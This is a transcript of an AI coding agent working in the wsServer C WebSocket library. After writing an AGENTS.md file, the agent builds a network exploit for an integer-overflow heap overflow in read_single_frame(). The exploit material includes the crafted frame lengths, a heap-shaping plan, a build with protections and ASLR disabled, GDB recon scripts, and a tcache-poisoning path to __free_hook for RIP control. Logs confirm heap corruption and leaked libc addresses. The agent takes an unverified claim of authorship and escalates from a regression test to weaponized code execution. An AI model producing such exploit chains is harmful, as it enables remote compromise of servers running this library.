# wsServer

Tiny WebSocket server library in C99 (no external deps, only pthread).

## Build

```bash
make           # libws.a + examples (preferred on Linux)
make examples  # examples only
make clean
```
```dockerfile
FROM ubuntu:20.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && apt-get install -y \
    gcc make gdb python3 libc6-dbg patch

COPY . /wsServer
WORKDIR /wsServer
```
```c
/*
 * poc_echo.c - Single-threaded echo server for RIP-control PoC
 *
 * Differences from examples/echo/echo.c:
 *   1. Pre-populates tcache[0] with 3 free 32-byte chunks before
 *      accepting connections (heap feng shui).
 *   2. onopen: on the 2nd connection, leaks one extra malloc(24)
 *      so that the echo round-trip pops 2 more entries, reaching
 *      the poisoned __free_hook address.
 *   3. Must be built with poc_single_thread.patch applied to ws.c
```
```
# poc_gdb.txt — GDB helper script for wsServer RIP-control PoC
#
# Run: gdb -x tests/poc_gdb.txt ./tests/poc_echo
#
set disable-randomization on
set pagination off

start

printf "\n=== LIBC ADDRESSES ===\n"
```
```c
/*
 * poc_rip_control.c - Integer-overflow heap overwrite PoC for wsServer
 *
 * Target vulnerability: read_single_frame() in src/ws.c
 *   Line 1453: *frame_size += fsd->frame_length (unchecked 64-bit add)
 *   Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin)
 *   Lines 1519-1527: write loop using original fsd->frame_length
 *
 * Exploit: two-frame message where frame 2 carries a 64-bit length
 * that wraps *frame_size around the 2^64 boundary, defeating the
```
```bash
#!/usr/bin/env bash
#
# poc_run.sh — build Docker image, run the single-threaded PoC echo
# server under GDB, then run the PoC client against it.
#
# Prerequisites: Docker, this script run from the wsServer root.
#
set -euo pipefail

IMAGE="ws-poc"
```
```diff
--- a/src/ws.c
+++ b/src/ws.c
@@ -1900,11 +1900,7 @@
 	/* Client socket added to socks list ? */
 	if (i != MAX_CLIENTS)
 	{
-		if (pthread_create(
-		        &client_thread, NULL, ws_establishconnection, &client_socks[i]))
-			panic("Could not create the client thread!");
-
```
Create or update `AGENTS.md` for this repository. The goal is a compact instruction file that helps future OpenCode sessions avoid mistakes and ramp up quickly. Every line should answer: "Would an agent likely miss this without help?" If not, leave it out.

User-provided focus or constraints (honor these):

## How to investigate

Read the highest-value sources first:

- `README*`, root manifests, workspace config, lockfiles
- build, test, lint, formatter, typecheck, and codegen config
- CI workflows and pre-commit / task runner config
- existing instruction files (`AGENTS.md`, `CLAUDE.md`, `.cursor/rules/`, `.cursorrules`, `.github/copilot-instructions.md`)
- repo-local OpenCode config such as `opencode.json`

If architecture is still unclear after reading config and docs, inspect a small number of representative code files to find the real entrypoints, package boundaries, and execution flow. Prefer reading the files that explain how the system is wired together over random leaf files.

Prefer executable sources of truth over prose. If docs conflict with config or scripts, trust the executable source and only keep what you can verify.

## What to extract

Look for the highest-signal facts for an agent working in this repo:

- exact developer commands, especially non-obvious ones
- how to run a single test, a single package, or a focused verification step
- required command order when it matters, such as `lint -> typecheck -> test`
- monorepo or multi-package boundaries, ownership of major directories, and the real app/library entrypoints
- framework or toolchain quirks: generated code, migrations, codegen, build artifacts, special env loading, dev servers, infra deploy flow
- repo-specific style or workflow conventions that differ from defaults
- testing quirks: fixtures, integration test prerequisites, snapshot workflows, required services, flaky or expensive suites
- important constraints from existing instruction files worth preserving

Good `AGENTS.md` content is usually hard-earned context that took reading multiple files to infer.

## Questions

Only ask the user questions if the repo cannot answer something important. Use the `question` tool for one short batch at most. Good questions:

- undocumented team conventions
- branch / PR / release expectations
- missing setup or test prerequisites that are known but not written down

Do not ask about anything the repo already makes clear.

## Writing rules

Include only high-signal, repo-specific guidance such as:

- exact commands and shortcuts the agent would otherwise guess wrong
- architecture notes that are not obvious from filenames
- conventions that differ from language or framework defaults
- setup requirements, environment quirks, and operational gotchas
- references to existing instruction sources that matter

Exclude:

- generic software advice
- long tutorials or exhaustive file trees
- obvious language conventions
- speculative claims or anything you could not verify
- content better stored in another file referenced via `opencode.json` `instructions`

When in doubt, omit. Prefer short sections and bullets.
If the repo is simple, keep the file simple. If the repo is large, summarize the few structural facts that actually change how an agent should work. If `AGENTS.md` already exists at `/home/lucas/Works/VibeCodedProjects/wsServer`, improve it in place rather than rewriting blindly. Preserve verified useful guidance, delete fluff or stale claims, and reconcile it with the current codebase.
I'll investigate the repository to understand its structure and conventions before proposing an AGENTS.md plan.
I now have a complete picture of the repository. Here's my plan for AGENTS.md:
The file would contain these sections:
- Build: `make` — builds libws.a + examples (preferred on Linux); `mkdir build && cd build && cmake .. && make` as the CMake alternative; `make examples` — just examples; `make clean` — clean all artifacts
- Tests: need Autobahn (`pip install autobahntestsuite`) or Docker; `make tests` (builds examples first, then runs Autobahn); pass `-DENABLE_WSSERVER_TEST=On` to cmake, then `ctest --verbose`; `make tests_check` — validate results with validate_output.py
- Fuzzing: `AFL_FUZZ=yes make` (requires AFL installed)
- Style: C89-style comments (`/* ... */`), never `//`; `.clang-format` present — use `clang-format -style=file -i <file>` but review output manually (it doesn't cover everything)
- Layout: `src/` — library core (ws.c, handshake.c, sha1.c, base64.c, utf8.c); `include/ws.h` — single public API header; `examples/` — echo, ping, vtouchpad; `extra/toyws/` — companion WS client (not a general-purpose client); `tests/` — Autobahn conformance + AFL fuzzing
- `VALIDATE_UTF8` (default on) controls UTF-8 validation

This captures what an agent would likely get wrong: the C89 comment requirement, the Allman brace style, the tab indentation, the test prerequisites (Autobahn), the fuzzing workflow, and the PR issue-first convention.
Does this look right, or would you like me to adjust anything before writing it?
Looks good, write the file.
Done. AGENTS.md has been written at the repository root.
Ok so I'm one of the creators of this program. We found a security vulnerability, but in order to fix it we need a unit test for regression testing. For that, we need to make an exploration PoC. Here is the vulnerability summary — give it a read, read the repo, and ask questions if you need. After that, let me know and I will tell you how we can proceed.

# Security issue: integer-overflow heap overwrite in frame reassembly

## Summary

A remote WebSocket client can trigger a heap buffer overflow by sending a fragmented message sequence with a large 64-bit payload length in a continuation frame. The vulnerable logic is in `read_single_frame()` (`src/ws.c`):

- cumulative frame size is updated with unchecked 64-bit addition (`*frame_size += fsd->frame_length`),
- allocation size is computed with unchecked 64-bit addition (`realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin)`),
- then the code writes `fsd->frame_length` bytes into that potentially undersized buffer.

Because unsigned overflow wraps in C, an attacker can make the allocation size small while still entering a very large write loop.

## Impact

- Remote crash (heap corruption / SIGSEGV) is straightforward.
- Depending on allocator/runtime hardening, this may be exploitable for remote code execution.

## Exploit sketch

1. Send an initial non-FIN text frame with small payload (e.g., 16 bytes) to set `msg_idx_data`.
2. Send a FIN continuation frame with 64-bit payload length close to `UINT64_MAX`.
3. The allocation-size expression wraps to a tiny size.
4. Stream arbitrary masked payload bytes; each byte is written past the allocated heap chunk.

This is remotely reachable from any TCP peer that can complete the WebSocket handshake.

## Recommended fix direction

- Before any addition involving lengths, use checked arithmetic and reject on overflow.
- Validate both:
  - cumulative message size (`*frame_size + fsd->frame_length`), and
  - allocation size (`*msg_idx + fsd->frame_length + fsd->is_fin`).
- On overflow/protocol violation, close with status code `1009` (message too big) or `1002` (protocol error).
I've thoroughly read the vulnerable code. Here's my analysis:
The bug is in read_single_frame() (src/ws.c:1410-1552), specifically:
Line 1453 — *frame_size += fsd->frame_length; — unchecked 64-bit addition. When a first non-FIN fragment sets *frame_size to N, a second continuation fragment with frame_length close to UINT64_MAX wraps the sum to a small value.
Line 1463 — if (*frame_size > MAX_FRAME_LENGTH) — this check is defeated because the wrapped value is tiny.
Line 1505 — realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — the allocation size also wraps to a small number (e.g. ~6 bytes).
Lines 1519-1527 — the write loop uses the original (huge) fsd->frame_length, writing past the heap chunk.
1. Frame 1 (non-FIN text, 16-byte payload) sets `msg_idx_data = 16`, `frame_size = 16`.
2. Frame 2 (FIN continuation) with `frame_length = UINT64_MAX - 10` — the allocation wraps to ~6 bytes, the check passes, then the loop tries to write `UINT64_MAX - 10` bytes into that tiny buffer.

How should we build the PoC and regression test? The existing fuzzing harness (`ws_file`) reads crafted binary files through the parser — but I notice `ws_file()` at line 2078 references a `cli_events` variable that doesn't appear to exist in the current code (looks like a leftover from the `ws_events` refactor to `ws_server`). Which approach do you prefer?
Good, network-based it is. Here's my plan:
What it does: A standalone C program that connects to a running wsServer instance (e.g. the echo example), completes the handshake, then sends a malicious two-frame sequence that triggers the integer overflow in read_single_frame().
| Frame | FIN | Opcode | Payload Length | Purpose |
|---|---|---|---|---|
| 1 | 0 | text (0x1) | 16 bytes | Sets msg_idx_data=16, frame_size=16 |
| 2 | 1 | continuation (0x0) | 0xFFFFFFFFFFFFFFF5 (UINT64_MAX - 10) | Triggers overflow |
Both frames are masked (server expects it — reads 4 mask bytes unconditionally at ws.c:1475-1478). Mask key = {0,0,0,0} for simplicity.
Expected effect:

- `*frame_size += fsd->frame_length` → 16 + 0xFFFFFFFFFFFFFFF5 wraps to 0x05, passes the MAX_FRAME_LENGTH check at line 1463
- `realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin)` → 16 + 0xFFFFFFFFFFFFFFF5 + 1 wraps to 0x06 — allocates ~6 bytes
- The write loop then copies 0xFFFFFFFFFFFFFFF5 bytes starting at `msg[16]` — immediate heap corruption on the first write past the 6-byte buffer

PoC client structure:

- `connect_to_server(host, port)` — TCP connect with host resolution
- `do_handshake(sock)` — send HTTP upgrade, read response
- `send_exploit(sock)` — send the two crafted frames + a small burst of payload bytes (just needs a few hundred bytes to corrupt past the tiny allocation, no need to send anywhere near the declared length)

Deliverable: `tests/poc_overflow.c`

I'm ready when you are — let me know if you want any adjustments to this plan before I start writing.
Ok so your objective is to prove we can manipulate `RIP` register. For that we will need to build a version with all compiler protections disabled (ASLR, Canary, etc...) - So sketch a plan on how to make that PoC.
Good. To prove RIP control, we need to chain the heap overflow into an arbitrary write primitive and then hijack control flow. Here's my plan:
Unprotected server build — new Makefile target that compiles the echo example with all mitigations off:
- CFLAGS: `-g -O0 -fno-stack-protector -fno-pie -D_FORTIFY_SOURCE=0`
- LDFLAGS: `-no-pie -z norelro -z execstack`

Disable ASLR: `echo 0 | sudo tee /proc/sys/kernel/randomize_va_space`
PoC client (`tests/poc_rip_control.c`) — a standalone C program that acts as a WebSocket client:

- Connects to `host:port` (default 127.0.0.1:8080)
- Frame 1: non-FIN text, 16-byte payload, mask `{0,0,0,0}` (sets msg_idx=16, frame_size=16)
- Frame 2: FIN continuation, declared length `0xFFFFFFFFFFFFFFF5`, mask `{0,0,0,0}` (triggers the realloc wrap to ~6 bytes)
- Streams filler (`A`) bytes to demonstrate heap corruption → SIGSEGV

Heap reconnaissance — this step is critical: we need to discover the exact heap layout before crafting the RIP-mode payload:
- Break on the `realloc` at ws.c:1505 (after the wrap)
- `p msg` — our buffer address
- `x/40gx msg-16` — full chunk + adjacent chunks
- `info proc mappings` — heap base, libc base, binary base
- `p &__free_hook` — target address in libc
- Determine what surrounds `msg`, what's in it, and whether there are free chunks we can corrupt

Most likely path — fastbin/tcache poisoning → `__free_hook` overwrite:

- The overflow writes past the `msg` chunk into the next chunk's fd pointer (if it's a free chunk) or corrupts its size field
- The poisoned fd points to `__free_hook - 0x10`
- A later `malloc()` returns a pointer to `__free_hook`
- We write a marker value (`0x4141414141414141`) there
- When `free(msg)` is called at ws.c:1713, glibc calls `__free_hook` → RIP = 0x4141414141414141

Alternative path — corrupt an adjacent allocated chunk's data:
If there's a heap-allocated struct with a function pointer adjacent to msg, we can directly overwrite it. Candidate: ws_prm (allocated at server start, contains ws_server with event callbacks). Whether it's adjacent depends on Phase 3 findings.
```
$ gdb ./echo_unprotected
(gdb) run
# In another terminal:
$ ./poc_rip_control --mode rip
# GDB output:
# Program received signal SIGSEGV, Segmentation fault.
# 0x0000000041414141 in ?? ()
```

Seeing RIP = 0x4141414141414141 proves full control.
| File | Purpose |
|---|---|
| `tests/poc_rip_control.c` | PoC client (connect, handshake, exploit) |
| `tests/Makefile.poc` | Build rules for unprotected server + PoC binary |
| `tests/poc_gdb.txt` | GDB script for heap reconnaissance |
What glibc version is on the target system? This determines which heap exploitation technique works (tcache poisoning, fastbin dup, etc.) and whether __free_hook is available.
$ ldd --version 2>&1 | head -1

ldd (Ubuntu GLIBC 2.39-0ubuntu8.7) 2.39
glibc 2.39 — __free_hook was removed in 2.34 and safe-linking is active. That rules out the classic approach. Let me check what Docker base gives us the best target.
$ docker images 2>/dev/null | head -20 || echo "Docker not available or not running"

```
IMAGE                                          ID             DISK USAGE   CONTENT SIZE   EXTRA
mcr.microsoft.com/presidio-analyzer:2.2.360    248a5fb234ed   1.54GB       0B             U
mcr.microsoft.com/presidio-anonymizer:2.2.360  97ebe789db35   249MB        0B             U
mongo:latest                                   b6fc3eda4f9a   950MB        0B             U
mysql:8                                        02ffa1ed2ee9   790MB        0B             U
opencode-share-server-share-server:latest      f84b5a0bc10b   29.1MB       0B             U
postgres:16-alpine                             108b27c919e6   276MB        0B
postgres:17                                    3fe059c96160   453MB        0B             U
redis:7-alpine                                 aa189b5a1954   41.4MB       0B
testcontainers/ryuk:0.13.0                     b75bc7ce94c3   7.2MB        0B
```

Docker is available. Here's my revised plan given glibc 2.39 on the host:
glibc 2.39 has no __free_hook, safe-linking (pointer mangling), and tcache key validation. Exploitation is possible (House of Apple 2, etc.) but requires forging IO_FILE structures — ~200+ lines of delicate glibc-internal manipulation that's fragile across point releases. Not worth it for a PoC.
glibc 2.31 has __free_hook, tcache without safe-linking, no key validation. Classic tcache poisoning works cleanly.
| File | Purpose |
|---|---|
| `tests/poc_rip_control.c` | PoC client — connects, handshakes, triggers overflow, demonstrates RIP control |
| `tests/Dockerfile.poc` | Ubuntu 20.04 build environment with unprotected server + GDB |
| `tests/poc_run.sh` | Orchestrator: builds Docker image, runs server under GDB, runs PoC |
| `tests/poc_gdb.txt` | GDB script: heap reconnaissance + verify RIP after crash |
Exploitation strategy — tcache poisoning → `__free_hook` → RIP. The wsServer message processing loop gives us alloc/free cycles we can use for heap shaping:
In `ws_establishconnection()`:

```c
while (next_complete_frame() >= 0) {
	onmessage(client_id, msg, frame_size, type); // echo calls ws_sendframe_bcast
	free(msg);                                   // msg freed each iteration
}
```

Each complete message: `malloc(msg) → onmessage → malloc(response) → send → free(response) → free(msg)`.
Step-by-step:
Connect + handshake — standard WebSocket upgrade.
Heap shaping — send 6-7 complete text messages of a specific size S (e.g., 0x100 bytes). Each cycle: malloc(S) → malloc(response) → free(response) → free(S). This populates the tcache bin for size S with free chunks. We need to fill the tcache (7 entries for glibc 2.31) so subsequent frees go to the unsorted bin.
Prepare the target chunk — send a message of size S, which gets freed into the now-full tcache (actually goes to fastbin or unsorted bin). Then send another message of size S — this allocation reuses a tcache entry, leaving a free chunk adjacent to where our exploit msg will land.
Exploit message (two frames):
- Frame 1: 16 bytes → `realloc(NULL, 16)` = `malloc(16)` → allocates msg
- Frame 2: declared length `0xFFFFFFFFFFFFFFF5` → `realloc(msg, 6)` (wrap) → same pointer (min chunk is 32 bytes), then the overflow loop writes past msg into the adjacent free chunk's fd pointer, overwriting it with the address of `__free_hook`

Trigger — after the overflow, `next_byte()` returns -1 and the function returns. Back in `ws_establishconnection`:

- `onmessage` is called with the corrupted msg → `ws_sendframe_bcast()` → allocates a response buffer of size S → malloc returns `__free_hook` (from the poisoned tcache)
- The response bytes are written to `__free_hook` — this includes parts of our msg payload (controlled data from frame 1)
- Caveat: the response allocation follows `frame_size`, which is tiny. We need the allocation to match the poisoned bin size.
- `free(msg)` is called after onmessage returns. If msg's chunk was also corrupted, this could trigger exploitation.

Demonstrate RIP control — `__free_hook` now contains 0x4141414141414141. The next `free()` call jumps there. GDB confirms: RIP = 0x4141414141414141.
The exact number of shaping messages, the size S, and the offset to the target chunk's fd pointer will be determined empirically:
- Break after `free(msg)` and examine the tcache: `p *(struct tcache_perthread_struct *)tcache`
- Verify the fd corruption
- Verify the next malloc returns `__free_hook`

Unprotected build:

```
gcc -g -O0 -fno-stack-protector -fno-pie -D_FORTIFY_SOURCE=0 \
    -z norelro -z execstack -no-pie \
    src/ws.c src/base64.c src/sha1.c src/handshake.c src/utf8.c \
    examples/echo/echo.c -I include -pthread -o echo_unprotected
```

ASLR disabled: `echo 0 | sudo tee /proc/sys/kernel/randomize_va_space`
```
./poc_rip_control [--host HOST] [--port PORT] [--shaping-count N] \
    [--shaping-size S] [--target-addr ADDR]
```

Parameters are configurable so the exact values can be tuned after heap reconnaissance.
Does this plan look right? If so I'll start building the deliverables.
Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.
- Network-based PoC approach chosen (not the broken fuzzing harness `ws_file`).
- Host glibc is 2.39 (no `__free_hook`, has safe-linking, and tcache key validation — too complex for a PoC).
- Chosen path: tcache poisoning on glibc 2.31 in Docker → `__free_hook` overwrite → RIP control.
- Coding style: C89 comments (`/* */`), Doxygen for functions/structs.

Vulnerability: `read_single_frame()` in src/ws.c:1410-1552

- `*frame_size += fsd->frame_length` — unchecked 64-bit addition, wraps around
- `if (*frame_size > MAX_FRAME_LENGTH)` — check is defeated by the wrapped small value
- `realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin)` — allocation size also wraps to ~6 bytes
- The write loop uses the original huge `fsd->frame_length`, writing past the undersized buffer

Exploit sequence:

- Frame 1 (non-FIN text, 16 bytes) sets `msg_idx=16`, `frame_size=16`
- Frame 2 (FIN continuation) declares `frame_length = 0xFFFFFFFFFFFFFFF5` (UINT64_MAX-10)
- `*frame_size += frame_length` → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH check
- `realloc(msg, 16 + 0xFFF...F5 + 1)` wraps to 6 → tiny allocation
- Write loop starts at `msg[16]`, writing far past the 6-byte buffer → heap corruption

The `ws_establishconnection()` loop (ws.c:1752-1782) gives us alloc/free cycles per message:
malloc(msg) → onmessage → ws_sendframe_bcast (malloc response) → send → free(response) → free(msg)
This allows heap feng shui: send complete messages of size S to populate tcache bins (7 entries on glibc 2.31), then overflow into an adjacent free chunk's fd pointer.
ws_file() at ws.c:2078 references cli_events which doesn't exist in the current code — a leftover from the ws_events → ws_server refactor. Not relevant to our network-based PoC.
ldd --version → glibc 2.39. Docker is available on the system.
- Masking is mandatory (ws.c:1475-1478) — all client frames MUST have the MASK bit set
- UTF-8 validation applies to text frames (ws.c:1655-1662)
- `AGENTS.md` at repo root — compact instruction file for future agent sessions

Plan: `__free_hook` overwrite → RIP control, with heap shaping via preparatory messages.

Deliverables:

- `tests/poc_rip_control.c` — the PoC client (connect, handshake, heap shaping messages, exploit two-frame sequence, configurable payload)
- `tests/Dockerfile.poc` — Ubuntu 20.04 image with gcc, gdb; builds the unprotected echo server
- `tests/poc_run.sh` — orchestration script (build Docker, run server under GDB, run PoC)
- `tests/poc_gdb.txt` — GDB helper script for heap reconnaissance and RIP verification

Status:

- `AGENTS.md` — repo instruction file (completed)
- `tests/poc_rip_control.c` — PoC client
- `tests/Dockerfile.poc` — Docker build environment
- `tests/poc_run.sh` — orchestration script
- `tests/poc_gdb.txt` — GDB helper script

Relevant files:

- `src/ws.c` — the vulnerable file, especially lines 1410-1552 (read_single_frame), 1565-1720 (next_complete_frame), 1735-1808 (ws_establishconnection), 2051-2101 (ws_file)
- `include/ws.h` — public API, struct definitions (ws_server, ws_events, ws_frame_data), constants (MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8)
- `examples/echo/echo.c` — target server binary, uses ws_sendframe_bcast in onmessage
- `tests/fuzzy/ws_file.c` — existing AFL fuzz harness (not used, but informed approach)
- `Makefile` — build system, AFL_FUZZ=yes option, CFLAGS
- `CMakeLists.txt` — alternative build, ENABLE_WSSERVER_TEST option
- `.github/workflows/c-cpp.yml` — CI config
- `doc/CODING_STYLE.md` — coding conventions
- `.clang-format` — formatter config (Microsoft-based, tabs, 85-col)

Ok, so let's do the work then!
Let me also check the internal structures and frame reading logic:
Now let me check the Makefile to understand the build flags, and also check how the ws_sendframe_bcast function allocates memory (for heap shaping analysis):
Let me look at how the server accept loop works and if there are any malloc calls in the main loop path:
Now I have a complete understanding of the codebase. Let me create all four files.
Now the main PoC client:
Edit applied successfully.
LSP errors detected in this file, please fix:
<diagnostics file="/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c">
ERROR [425:4] Call to undeclared function 'usleep'; ISO C99 and later do not support implicit function declarations (fix available)
poc_rip_control.c:425:4: note: did you mean 'sleep'?
ERROR [510:2] Call to undeclared function 'usleep'; ISO C99 and later do not support implicit function declarations
</diagnostics>

The `_DEFAULT_SOURCE` needs to be defined before any system headers. Let me fix this:
Edit applied successfully.

Now the GDB helper script:
Now the orchestration script:
$ chmod +x /home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_run.sh

Now let me compile the PoC client locally to check for errors, then build the Docker image:

$ gcc -Wall -Wextra -std=c99 -o /dev/null /home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c 2>&1

Clean compile. Now let's build the Docker image:
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1

#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 925B done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...
#3 [auth] library/ubuntu:pull token for registry-1.docker.io

DNS resolution failure in Docker build. Let me check the network and try again:
$ docker network inspect bridge 2>/dev/null | head -20; echo "---"; cat /etc/resolv.conf | head -5

The user rejected permission to use this specific tool call.

Ok try again, I restarted docker.
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1

#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 925B done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...
#3 [auth] library/ubuntu:pull token for registry-1.docker.io

Build succeeded. Now let's do the initial reconnaissance run — launch the server under GDB and fire the PoC:
$ docker rm -f ws-poc-server 2>/dev/null; docker run -d --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt -ex "set pagination off" ./examples/echo/echo 2>&1' > /tmp/poc_gdb_out.txt 2>&1; echo "Container started, PID=$!"

Container started, PID=0
$ sleep 3 && docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1

Error response from daemon: container 80e7753bf22e3fee85f7fada2022124d9ed5529a3e0270a562c4ba836630aaea is not running
Container exited already. Let's check the output:
$ cat /tmp/poc_gdb_out.txt

80e7753bf22e3fee85f7fada2022124d9ed5529a3e0270a562c4ba836630aaea
$ docker logs ws-poc-server 2>&1

tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
The __free_hook symbol isn't available before the program runs. Let me fix the GDB script:
Edit applied successfully.

Now let's run the auto mode — server in GDB + PoC fired automatically:
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo 2>&1' &
SERVER_PID=$!
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 2
echo "=== GDB Output ==="
wait $SERVER_PID 2>/dev/null
echo "=== Done ==="

ws-poc-server
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
=== Done ===
The issue is GDB validates commands at definition time. Let me restructure the script:
You froze, please continue.
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo 2>&1' > /tmp/poc_out.txt &
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
echo "=== GDB Output ==="
wait 2>/dev/null
cat /tmp/poc_out.txt

=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
The commands block validates at parse time on this GDB version. Let me use start instead:
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB Output ==="
cat /tmp/poc_out.txt

=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
Did you build with debug symbols?
No — the Docker image still has the old GDB script (built before I updated it). Let me rebuild:
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -5

#11 exporting to image
#11 exporting layers 0.0s done
#11 writing image sha256:de3118efbe51a2bbfdd34b09ef5d8ba2386e809d2db62bb6dcc65e42e81e1a89 done
#11 naming to docker.io/library/ws-poc done
#11 DONE 0.0s
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 5
echo "=== PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB ==="
cat /tmp/poc_out.txt

=== PoC ===
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK
[*] Sending exploit (f1sz=16, ovf=128 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 164 bytes (hdr=36, ovf=128)
=== GDB ===
Temporary breakpoint 1 at 0x401746: file examples/echo/echo.c, line 118.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

The register offsets are wrong. Let me fix the GDB script to use proper variable names since we compiled with -O0:
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -3 && \
docker rm -f ws-poc-server 2>/dev/null; \
docker run --rm --name ws-poc-server --network host --privileged ws-poc \
bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 5
echo "=== PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB ==="
cat /tmp/poc_out.txt

#10 writing image sha256:e4e4b2ceb61fd3c60f3d6c5202eec1750f12d9fe01bfd593c8087f6c10115c8c done
#10 naming to docker.io/library/ws-poc done
#10 DONE 0.0s
=== PoC ===
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK
[*] Sending exploit (f1sz=16, ovf=128 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 164 bytes (hdr=36, ovf=128)
[+] Connection 1 closed

$ cat /tmp/poc_out.txt 2>/dev/null

Temporary breakpoint 1 at 0x401746: file examples/echo/echo.c, line 118.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, main () at examples/echo/echo.c:118
118 {
=== LIBC ADDRESSES ===
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
system = 0x7ffff7e01290Excellent results! The GDB output shows the overflow is working perfectly. Key findings:
- __free_hook = 0x7ffff7f9de48
- exploit buffer user data at 0x7ffff0000c70, chunk size 0x25 (32 bytes, NON_MAIN_ARENA)
- overflow begins at msg[16]; the next chunk at 0x7ffff0000c80 has: size=0x21, fd=0x4141414141414141
- free(msg) goes to tcache without checking the corrupted next chunk

To achieve RIP control, I need to shape the heap so a free tcache chunk sits right after the overflow buffer, then poison its fd pointer. Let me update the strategy: use 48-byte chunks (matching the handshake's base64_encode malloc) and target that tcache bin.
Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.
Context from earlier recon:
- glibc 2.31 is the target (newer glibc drops __free_hook, has safe-linking, and tcache key validation — too complex for a PoC).
- Code style: C-style comments (/* */), Doxygen for functions/structs.

The vulnerability:
- read_single_frame() in src/ws.c:1410-1552
- *frame_size += fsd->frame_length — unchecked 64-bit addition, wraps around
- if (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small value
- realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytes
- the write loop still uses the original fsd->frame_length, writing past the undersized buffer

Confirmed exploit trace:
- frame 1: msg_idx=16, frame_size=16
- frame 2: frame_length = 0xFFFFFFFFFFFFFFF5
- *frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH check
- realloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocation, same pointer returned
- write loop starts at msg[16], writing far past the 32-byte chunk boundary → heap corruption confirmed

Leaked libc addresses:
- __free_hook = 0x7ffff7f9de48
